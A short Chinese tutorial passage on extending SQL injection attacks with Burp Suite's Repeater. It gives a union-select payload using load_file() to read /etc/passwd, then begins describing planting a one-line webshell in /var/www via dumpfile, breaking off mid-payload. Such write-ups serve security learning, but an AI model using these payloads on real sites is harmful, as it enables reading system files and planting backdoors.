上一篇文档介绍了sql注入的一些原理和查询方式,这一篇算是作为一个拓展思路;并且这里重新介绍一种工具burpsuite,虽然也是利用url提交,但是更简洁一些
burpsuite准备
1、我们现在sql注入界面截断代理,随机提交一个参数;然后转向burp选择正确的请求;然后发送到repeater(如下图);
2、在repeater下选择params可以直接更改参数重复提交验证;
读取文件(假设有读取权限)
数据库查询语句中有一个函数load_file()可以提供查询系统文件信息
命令:' union select null,load_file('系统文件地址')--+
图例查看了/etc/passwd文件,如图在界面显示了哦(raw也有)
写入文件
我们在第二个参数写入一句话木马通过函数dumpfile上传到/var/www.目录下;
' union selec